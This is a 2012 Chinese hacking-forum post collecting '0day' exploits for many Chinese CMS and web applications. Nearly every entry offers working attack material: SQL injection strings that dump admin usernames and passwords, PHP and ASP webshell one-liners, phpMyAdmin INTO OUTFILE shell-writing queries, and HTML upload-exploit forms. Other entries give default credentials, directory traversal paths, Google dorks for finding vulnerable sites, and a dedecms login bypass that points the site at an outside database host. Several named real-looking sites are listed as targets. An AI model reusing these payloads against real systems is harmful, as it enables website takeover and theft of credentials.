找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3697|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
$ c/ s, x2 ~8 ^
: O2 q0 z9 N! L, Q4 Z直接上exploit:
/ g; _& |9 p1 e2 A$ s' I! Sjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
* w! W! q* x6 t7 R$ o5 otest:http://www.tb11.net/system/xitong/shownews.asp?id=210
5 U6 u% @# W& j4 r--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' J( @4 r, M1 Y- kAsprain论坛 注册用户 上传图片就可拿到webshell8 [1 I) Q6 _0 U, o- l2 f, x

+ m1 Y/ Y8 ^' W& VAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
% p, @* l! l, o( F4 v$ ^) I1.txt存放你的一句话马 如:<%execute(request("cmd"))%>( n- z1 Z7 ]8 {- U
2.gif 为一小图片文件,一定要小,比如qq表情图片% j- _& D) q' [( ]! u* M, m. n7 }
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
- k  b( W3 p4 `7 v" A4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了) y( s. [" O" i- s
5.q.asp;.gif
, Y0 l" Z9 u) w+ z  rgoogle:Powered by Asprain
- x! \; O. G' h/ X/ f: v1 x--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 e8 H  ?  u0 }  G3 ?

5 h1 y! k/ G0 `0 LShopNum1全部系统存在上传漏洞。5 Z) b& N& ^" z9 x% a4 W! X: G

9 O0 {0 \/ ^6 o5 S! d( i首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。4 I! _* n( i6 q$ w
按说明 提示登录后台。。, I. e7 N: k' m* C' n
在后台功能页面->附件管理->附件列表
( d$ I  D/ D4 S( B可以直接上传.aspx 后缀木马
( ^& _* O4 ?6 J6 Z0 L- yhttp://demo.shopnum1.com/upload/20110720083822500.aspx
5 }0 c8 |/ u. y9 l- V! G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 m* W; _9 e" x3 y3 b; K: W& |7 i& c& X- b( O* q
牛牛CMS中小企业网站管理系统 上传漏洞
# o. D% G% l6 c7 `! U9 S# F* X$ ^" W+ V4 y+ ]' z/ ~' q
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
" K9 _4 T- T5 U+ h# m7 i( o后台:admin/login.asp
7 p) I5 [1 T" Y# Dewebeditor 5.5 Nday. v# Z. R' `! u- I, c% t5 m
exp:! w, Z5 {9 I7 e3 `7 Y8 a7 I9 ]
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
2 `; C% [( H$ F3 T/ N* J. r0 m# [0 W<input?type=file?name=uploadfile?size=100><br><br>?1 `! q- }, J+ M1 L
<input?type=submit?value=upload>?- e! \4 p1 \& O* `. @. c
</form>6 y( q) Y0 L% J6 ~/ }$ a) N1 y
ps:先上传小马.
( d3 `+ C8 F' n9 {inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
5 ^0 S, \+ H) H+ D/ ^
' S8 {4 _# {6 u--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ A- h% z: |6 P5 g2 b& I
4 M! \' v# h5 t: e: A3 a
YothCMS 遍历目录漏洞
& V) M7 e; ?2 v+ t' l' G! u' Q$ s9 u
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
( V$ O2 S! J1 n) {6 s默认后台:admin/login.asp8 b- Y. N( H0 e4 Z$ l  B+ D
遍历目录:
/ d8 \' G/ y0 }1 j" M4 _. o, V- y8 C, Kewebeditor/manage/upload.asp?id=1&dir=../& r0 N' R; @- C
data:
( T6 E. w- n5 q  z, Ghttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
+ U( V. k5 {7 x. k$ W" O9 f' V--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 i- }* v3 B8 S' ~: K0 m: N, x
$ u! C/ O  C) k- jNet112企业建站系统 1.0; p4 |) g9 p" ?: n: ~/ w- r
& S' s% Q7 p: Y2 |2 R6 h& \
源码简介:1 _4 o/ x, ?6 a- M3 S3 S
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
0 j6 T- z+ @. E' K6 T  m添加管理员:
2 O  W4 T5 ]' ?9 g- E; {/ V) bhttp://www.0855.tv/admin/admin.asp?action=add&level=2
% [$ g, `- O2 B( y* [6 k4 x% `其实加不加都不是很重要,后台文件都没怎么作验证。& i3 S/ m" @- n4 v
上传路径:8 k$ r# l: O: W5 c, z
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200  Q: e/ Y" I$ e" B' i6 Q/ |9 E/ V
http://www.0855.tv/inc/Upfile.asp?Stype=2
0 ?8 S: Q1 g- L怎么利用自己研究。) k7 L' r; J+ ~9 J1 H3 r
遍历目录:0 K1 n  X, I* {8 _7 O
http://www.0855.tv/admin/upfile.asp?path=../.." P$ D  Y6 H  ^* d3 o6 s
如:
  t! T9 n. F5 s& w& m& U9 T  r" Dhttp://www.0855.tv/admin/upfile.asp?path=../admin3 W! o2 ]& ]2 K2 k' I
http://www.0855.tv/admin/upfile.asp?path=../data2 C' l4 Y, ]7 x, b. ~" H8 ?
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# a) I4 }$ r, G& |

$ Z5 c- u$ L" l: T/ h7 _易和阳光购物商城通杀 上传漏洞
7 p+ ~' j8 Z5 @) O, q% R# T
' e3 O1 t6 E7 x- S# w' [8 [前提要求是IIS6.0+asp坏境。
4 N! D0 M- v; |! v. W8 A漏洞文件Iheeo_upfile.asp
! @) d  x& z% R过滤不严.直接可以iis6.0上传
  \9 C8 e  `- H1 y1 Z" \) y, G把ASP木马改成0855.asp;1.gif" J! a$ [$ K, d. H$ [1 W1 w
直接放到明小子上传
( k) U$ f! H9 r5 xGoogle搜索:inurl:product.asp?Iheeoid=* f! e! ~/ k: j9 ?, o
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( _7 C# ^# L3 R

5 b4 J( V% b2 O9 Ephpmyadmin后台4种拿shell方法
0 M( ]: [& v* G2 A( S: w) k- S3 z8 }" ~9 b4 w. L7 ~: m
方法一:
# O: M8 F8 F  K. ]0 }! U1 DCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );" t6 X+ @- p7 D, U: [% k7 T) H
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
6 y6 J9 p7 h; r2 N+ o) G' bSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 `: h/ Y7 J1 F8 Q# [----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
0 e* J# P, ~/ g3 L: e. @( ]+ V! Y, l9 H一句话连接密码:xiaoma
: u/ A$ c1 @, O. u/ U+ s方法二:
6 H# r9 F0 Q3 @) \  HCreate TABLE xiaoma (xiaoma1 text NOT NULL);" Y) i# P: k6 }; v" z4 b2 E9 Q+ v
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
1 `. N7 _! Y0 v/ u" @select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
% E: v4 O4 B- Z; [- uDrop TABLE IF EXISTS xiaoma;& f2 t" t# _$ V- c7 i4 F
方法三:
5 {4 ?8 t' b! ]读取文件内容:    select load_file('E:/xamp/www/s.php');
0 s! S) S6 |9 L" s  O写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'. R' p- O$ Q# p2 U
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 _4 K3 I  R8 |( L; A7 J! D* \方法四:
- H1 `# h; A! g3 x8 o0 Rselect load_file('E:/xamp/www/xiaoma.php');1 f1 d2 H! X8 D& I1 U
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'3 Y5 J& _& X2 n# X% b! V
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
- G/ n8 w6 w6 |/ A  O/ N. B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 {! R3 [! b: {' U# K
/ ^9 S! k+ h5 E. g2 M$ \9 {& i
传信网络独立开发网站源码0day漏洞
+ B: R/ P6 J5 M+ }% n
0 A8 g7 O; k% [% U5 G后台system/login.asp! \7 J$ o2 n# Z' H
进了后台有个ewebeditor
, `( `  D3 M! R8 j; d  e; H0 P8 H3 O1 ]Google 搜索inurl:product1.asp?tyc=  ?+ x( c6 ]! J2 M7 T6 r8 H
编辑器漏洞默认后台ubbcode/admin_login.asp
  n) ^2 }9 p$ |/ [) p- O6 g数据库ubbcode/db/ewebeditor.mdb6 f* k  R: E, A3 B+ r/ m! S
默认账号密码yzm 111111
0 }' w; ]( c" n* ^& N9 l+ w# J3 i
拿webshell方法& C/ r& N* k8 ^, H* ~* G
登陆后台点击“样式管理”-选择新增样式
9 Y- u7 N3 t8 {2 O1 f/ `) a) Z样式名称:scriptkiddies 随便写
. {& y5 B( g/ ~9 n路径模式:选择绝对路径 9 v/ n- ?0 G' m6 f/ b5 Y1 J! M
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx. i: l. {! Z% a% `
图片类型比如就是我们要上传的ASP木马格式
0 i/ ^7 M* Q7 M! J2 n( d* i上传路径:/
" l, I2 Q4 X, V% j6 Q图片限制:写上1000 免的上不了我们的asp木马; p  k+ d2 C/ D6 U( R7 b2 r& V+ }
上传内容不要写0 @- S1 m# P- S3 \7 ?1 ]
可以提交了 " t: G; L% B- \, ^5 H5 x/ S
样式增加成功! , z3 D& Z+ }, h! s6 D' q
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
' x  K9 t- O% p按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
' R* s( L! ?& n网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies7 G  \- q- w; W$ V% ~: s5 J/ t
上ASP木马 回车 等到路径
7 |7 {( G: r# X* o+ U
; j) p$ C/ l" o: t2 f) g8 |后台:system/login.asp% p: O( B. R7 Y7 U3 h% q0 A
Exp:
* ~, H! C) @* ?$ {and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
1 s# f4 T3 P# N% R4 _' Z测试:$ L; p6 c0 D7 e; M+ {  r; e: y
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
% A1 V; U: P  Phttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
% X* Z" C. q5 j% E. [: d5 F0 n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 n4 a) y+ w) v

$ }6 E6 H' E; E" r4 x' }8 k6 `foosun 0day 最新注入漏洞" [" k: m6 E; K6 r$ j2 {/ c& u' ^
6 D9 h: r; e/ g1 P
漏洞文件:www.xxx.com/user/SetNextOptions.asp% |2 w2 o3 O+ b/ W; a2 W
利用简单的方法:
" _$ Z6 N1 X3 G7 H8 x2 _暴管理员帐号:6 n/ _: \; P+ P7 b% E
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin' e4 v% O, m0 |/ ^
暴管理员密码:
6 p$ c: W5 L5 N! i9 dhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
+ I, b4 `8 i; I! c  b9 \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 l" i* c& F7 L
% i: O2 |/ V- Y+ K: O) _( O0 U( L网站程序的版权未知!& k$ b+ Z" A: N( @- n  n
( U7 J* J3 j# o, x8 A
默认网站数据库:
5 _9 T( ^6 U- C  ^5 ^www.i0day.com/data/nxnews.mdb
; H; A: L9 w- e  A- Aewebeditor 在线编辑器:
" r8 T) ^0 }! {" U& f编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb4 J, F# ^) _+ f7 E+ E6 T
登录地址:ewebeditor/admin_login.asp3 E/ J% \2 \( i$ ^7 K* K4 h
默认密码:admin  admin
/ s0 l+ I; }8 ?" B* S- Z  |登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data6 h$ y5 o: j2 y
! c( N: Q) o/ F3 p  m  l
Sql注入漏洞:+ a; L) j0 j- `' d+ C: `  H) ~
http://www.i0day.com/detail.asp?id=12. E! S6 q* \5 V+ Q, i6 v
exp:7 X3 ]' \& s; f# C, E$ p2 X
union select 1,admin,password,4,5,6,7,8 from admin, S! Q9 N$ C6 X3 J, Y
爆出明文帐号/密码) _7 ?( y' `5 }* X5 ^
7 T/ n/ N9 {9 p* F! [
上传漏洞:6 e- @$ x: ^) w9 Z9 d' F4 W0 N" M! x' u9 u
后台+upfile.asp$ X; m: O0 X* m; @) _+ e
如:& d, J: W! h) _& \" t4 X
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。% H. h/ m4 K  _- M3 Q1 ~
shell的地址:网址+后台+成功上传的马
/ l1 y' y" L, W2 Xgoogle:inurl:news.asp?lanmuName=
+ S1 U, [, d) {+ N/ W2 r------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 g3 D% b' q! R' ~2 }6 Z
8 s. W( [9 u6 vdedecms最新0day利用不进后台直接拿WEBSHELL
0 a- j2 B* m$ R; d6 }3 e
. `) Q+ }) y3 ^$ ~/ }拿webshell的方法如下:
" Z4 T) N" t2 f0 z  a网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
2 h, T7 J: M* [$ I, i. i前题条件,必须准备好自己的dede数据库,然后插入数据:  F7 _' q! p6 D' \. y- a, W( P
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
( K2 ~# ~  j4 K3 m6 s2 H
/ {$ m+ e2 B5 F( X0 n% B再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
" R3 Q) @% o' R<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">$ ]* \* M; E) i* F' h1 a
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />" E5 ~; a5 S) l4 R- G9 W' m# }
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />) V& O7 }, X& b
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />* N9 _& W4 ~2 x
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
3 O' m4 K4 B  t  c* F<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />9 v, c5 k' I5 ^
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( a1 S; N/ P! E
<input type="text" value="true" name="nocache" style="width:400">* h, f( j7 Y! f
<input type="submit" value="提交" name="QuickSearchBtn"><br />
" l; L( M- N) h' M</form>$ h7 a0 `8 v% |6 a7 k7 T
<script>
' P0 R7 e+ F' z) }4 @) Kfunction addaction()
7 O" d, D( {  R3 {/ q{1 [9 i  w; _9 O( Q, z$ J" N/ J
document.QuickSearch.action=document.QuickSearch.doaction.value;
, g0 k! I0 f# A5 d}# C+ k/ Y( j: z
</script>7 Q; j2 v' z4 ]: Z( s2 A
-----------------------------------------------------------------------------------------------------------------------------------------------4 b/ x( ]$ |. W& Q. i
( M$ b. S7 T( v
dedecms织梦暴最新严重0day漏洞, m3 y' y6 O  i- w" d8 E
bug被利用步骤如下:
" J3 p0 ~9 q9 Y  y; {http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. l2 h' f* D! }7 @( K/ o7 D1 M
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
7 I# Y9 c0 K& z& y' M0 w-------------------------------------------------------------------------------------------------------------------------------------------
8 E* p' y; C' Y
/ T7 W9 |3 ^' {. `. E6 y$ b$ e多多淘宝客程序上传漏洞 * s. \( D. x" y# B6 g
漏洞页面:' d8 t# f4 |* X" ~5 |4 m
admin\upload_pic.php* J$ X0 d$ y$ c; z) A2 C
传送门:6 A  t3 G9 d7 j* k3 I# Q
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
" F! `- \% B! @& U& z) d" }2 V+ tPS:copy张图片马 直接  xxx.php 上传抓包地址!2 o. \  |- @1 o& Z
------------------------------------------------------------------------------------------------------------------------------------------------------
" {- m4 O5 X; p: Z" j) G/ M
$ c3 M. m( G5 Q- n9 V3 T" N4 y  w无忧公司系统ASP专业版后台上传漏洞
0 Z# Q$ \% ?, a6 j漏洞文件 后台上传5 R+ v2 u& o: E
admin/uploadPic.asp# q9 ^" k/ Z: @- S/ G8 t
漏洞利用 这个漏洞好像是雷池的8 r) t( R' P6 J6 }! a" H
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=11 E3 Z/ E4 k6 v- P
等到的webshell路径:7 r* J5 s* O- ^$ x
/UploadFiles/scriptkiddies.asp;_2.gif
" Y: `& t( T; R( V  C---------------------------------------------------------------------------------------------------------------------------------------------------
$ E+ {$ P6 Y2 v, H# |6 t5 K  l+ n: B2 p
住哪酒店分销联盟系统2010
6 Z6 k% |+ F" v5 |, NSearch:$ G5 L: b' s2 s
inurl:index.php?m=hotelinfo  N9 A' e4 x, X3 P9 ^! @1 o7 k+ i/ A
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
+ Z; j4 v; t/ Y' Y: `7 X默认后台:index.php?m=admin/login
, d) J# B5 S6 q  F! |--------------------------------------------------------------------------------------------------------------------------------------------------
7 J6 E* S. w# v- `# s  L* x1 Q* X
( N" [9 k: {+ G4 Cinurl:info_Print.asp?ArticleID=7 k3 z5 R* ?6 x* l0 l7 B2 C
后台 ad_login.asp
# M% a3 z" F, _9 @" i9 q爆管理员密码:! O, ]" b  y$ S" h& b/ P
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin$ K  I: \! g  G4 g
------------------------------------------------------------------------------------------------------------------------------------------------------------# }7 P9 V9 v( b( _; N8 P
& S+ t/ J5 q7 a' I, X2 g2 L8 B
搜索框漏洞!- r, y! e0 u- f: u2 t8 a
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='' d* O1 z+ c" Q; N. `
--------------------------------------------------------------------------------------------------------------------------------------------------------0 K( r% ~5 P& H5 t/ \$ A; Z0 K$ v% W

6 ^, {+ {9 {# Z9 E6 h关键字:
/ |: I# a( k5 \) I5 a  i/ Vinurl:/reg_TemletSel.asp?step=23 P$ Z4 V& ^7 q& E3 N2 C7 z7 {
或者% R8 A* Y* L* j# @+ l1 ?# q$ c
电子商务自助建站--您理想的助手6 a# d9 j( j. J# C# z4 J
-------------------------------------------------------------------------------------------------------------------------------------------------" @# n8 g2 ~  K' K! _! t
! N  U& h: w) |5 w! ^/ y) D
iGiveTest 2.1.0注入漏洞2 W& {0 y7 F# C
Version: <= 2.1.0
6 J$ t5 j5 ~' _6 |' @* E3 E  D; d3 k; d# Homepage: http://iGiveTest.com/9 I) t% Q8 O; ]; A5 c! M
谷歌关键字: “Powered by iGiveTest”
( k/ \9 K3 Z  O( [随便注册一个帐号。然后暴管理员帐号和密码
2 d. \6 x  v4 g+ |: E2 y$ k1 {8 Uhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
/ R$ [/ x" G$ T( b------------------------------------------------------------------------------------------------------------------------------------------------
' F" \# h1 w3 b( H( ~! d1 V2 y+ ]+ r5 E6 F
CKXP网上书店注入漏洞; \. b3 }+ h- U, X0 V
工具加表:shop_admin 加字段:admin
2 `0 [8 f7 \# Z' k+ \9 O+ M后台:admin/login.asp % g' `. h1 j* P+ a: F
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/6 {: a7 b( p* H
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息3 r# \& t! ~4 N6 |2 v' t& A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ o# m, I. |% k2 ~. ~  {( N
' m# l. \, f. t6 V2 k/ |3 u- r1 V
段富超个人网站系统留言本写马漏洞8 E: r1 ], l6 z1 r, x. Q" {. W, w
源码下载:http://www.mycodes.net/24/2149.htm
& F+ Z" g9 O% |( X3 Faddgbook.asp 提交一句话。+ ^9 ]9 ?3 l: p5 I
连接: http://www.xxxx.tv/date/date3f.asp9 u( D2 ~5 {/ W, U7 c& _( c
google:为防批量,特略!: T. \8 Y# D% C& [4 P5 K
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 ^; X9 f* n7 H, [

/ d4 h4 M' a+ b% I# O3 S智有道专业旅游系统v1.0 注入及列目录漏洞. Q% \/ U& P& J( H
默认后台路径:/admin/login.asp3 L: u' L8 L& {5 u% F2 D
默认管理员:admin
5 ]3 s4 H6 s) O* r2 v4 {- ]' e6 {默认密码:123456  o6 m! B6 m3 u/ W" T
SQL EXP Tset:
/ V/ n; a: m* ?5 X# t7 @http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin& }& R  k( ?+ W0 I
------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 \& S+ v8 ]6 U* O0 v% z

: o# _9 P+ m! Kewebeditor(PHP) Ver 3.8 本任意文件上传0day9 z, a( z' w8 x; q4 B& I
EXP:. q5 ^1 h- h7 r: J6 [# N. \6 v
<title>eWebeditoR3.8 for php任意文件上EXP</title>6 p! g: T+ A' s* R8 Z
<form action="" method=post enctype="multip, s1 x0 T  [4 S+ t" [  L
art/form-data"> ' a* r0 \  V, c+ ]- l* S0 J
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
4 W3 y: r( b; }$ `" ZURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
1 d, O, Z0 r! S' Q2 A' a<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
7 Q5 u1 ?# U# ~9 xfile:<input type=file name="uploadfile"><br>
+ w- S, d: ]2 \5 J5 G, Y. E<input type=button value=submit onclick=fsubmit()> 5 G- {  H0 |& Q
</form><br> ; y" R! ~; M( z( }& W
<script> # f) l1 d5 ^! n  I8 Y0 M
function fsubmit(){   _( F+ y6 o! u. w. s
form = document.forms[0];
3 j: q# M6 q5 e0 [form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
" a+ P0 I* B, U! N2 ?alert(form.action);
- T$ p+ G0 ~: v% b' ^form.submit(); 0 y1 A% S+ E% ^; v3 f, B4 V) o
} 9 ]- n& P8 g8 x* ~& U) f
</script>1 f( F3 s" S* r: v' X& u
注意修改里面ewebeditor的名称还有路径。
7 L4 `) P+ n2 p& R---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 ?& k' r. N' `' t* P: n9 u$ W* Y, T* @0 l8 ]2 Y6 ^
提交’时提示ip被记录 防注入系统的利用4 u$ f' O3 V' \6 z6 }6 `
网址:http://www.xxx.com/newslist.asp?id=122  Y$ i) C0 J+ a8 B3 Y  W6 C( v2 m" W
提示“你的操作已被记录!”等信息。: f' z  h  v" j: O( ~% A3 E) M5 o
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。" a' m+ t9 h0 V0 r) c  A
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& {7 S7 o7 u8 a5 X7 }4 g4 G% J* @8 G5 n* h2 R
西部商务网站管理系统 批量拿shell-0day
8 ?4 \: [- w" J5 K% Y( P这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
5 j$ U6 ~  r" H) ~# z5 u: a1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛# {* [- p# c% K) E: T  H  Q
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合' R/ s9 O1 m# O* X, b
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂4 e; x' _3 j4 Z4 v8 t
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- o- M4 e# y! J0 X  @8 e) C) p/ M: j
/ u6 Z4 B5 D) S  d: F; Q# B0 O0 B
JspRun!6.0 论坛管理后台注入漏洞
3 ]! ^! C6 H9 ^9 {
! v# k4 s" j9 x: E! VSEBUG-ID:20787 发布时间:2011-04-30 影响版本:6 Y8 L, K. A: \! N& J+ j
JspRun!6.0
! s' C3 R. v3 i& O/ _" c. a漏洞描述:3 L' |( D- ^5 ^# E. w) S( M
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。0 ]' a$ H% l; Q( U4 W- k$ B
在处理后台提交的文件中ForumManageAction.java第1940行
3 D# ^% H4 U" w' w4 i( wString export = request.getParameter("export");//直接获取,没有安全过滤. [* k* O( p, z2 v; y$ B- o5 m
if(export!=null){* v1 [  d& R8 ?% w4 w- c' K9 w
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
7 e" q5 v2 Q1 Cif(styles==null||styles.size()==0){5 e# F0 n3 e& [* h$ X% s7 {
<*参考+ x, I& }' A& B% _: D" J
nuanfan@gmail.com" W& ?) D/ x0 X3 h, \; ^* @# F, {3 C; [
*> SEBUG安全建议:
, X& i0 G! C& R  M: u! ~( {0 L! ^# @* N; }' hwww.jsprun.net3 X9 }! {7 B' p$ i
(1)安全过滤变量export
6 Z* r/ }! S  y3 Z(2)在查询语句中使用占位符% R+ H3 o, {: d8 \# n( f
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------. V4 O" J2 `* ^. ?# T' g: ?
  V) m" ^- l! s( L" j! L
乌邦图企业网站系统 cookies 注入6 c( I5 {- g0 [3 [/ |/ y
% i; o% J- s0 J/ |5 ?
程序完整登陆后台:/admin/login.asp& J2 X( `  v' w% W* A7 Y
默认登陆帐号:admin 密码:admin888
8 z: E# T) _7 u! _语句:(前面加个空格)
8 F! \/ }9 ^4 }9 W. J' jand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin; M; D1 ]2 d/ y' A! _" R6 W
或者是16个字段:
: j( b6 o' d4 e7 L" [and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
- ]' e6 S+ s+ u; j0 v爆不出来自己猜字段。- O) L6 A) B2 q7 w
注入点:http://www.untnt.com/shownews.asp?=88
) K. T' q: [5 l2 K8 p* Mgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp9 A2 V$ K% `/ p
关键字:$ v5 R  L" w9 \& `* Q" s! Q$ f- l" k9 ^
inurl:shownews?asp.id=3 l' G9 S" d, d
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 C, j$ S: g7 S( E0 y' g
% E+ Z, }" O7 r1 D" k4 w
CKXP网上书店注入漏洞% j" w/ N4 L2 X1 ]7 I% c
3 E& ?. `5 Q: d+ Y! a$ G
工具加表:shop_admin 加字段:admin
4 K  V4 R. g2 K' M! x8 [; Q# I后台:admin/login.asp
6 V) D$ A6 K; Y$ {; r& j登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
: x! N1 Y* _' Q9 G6 Uinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
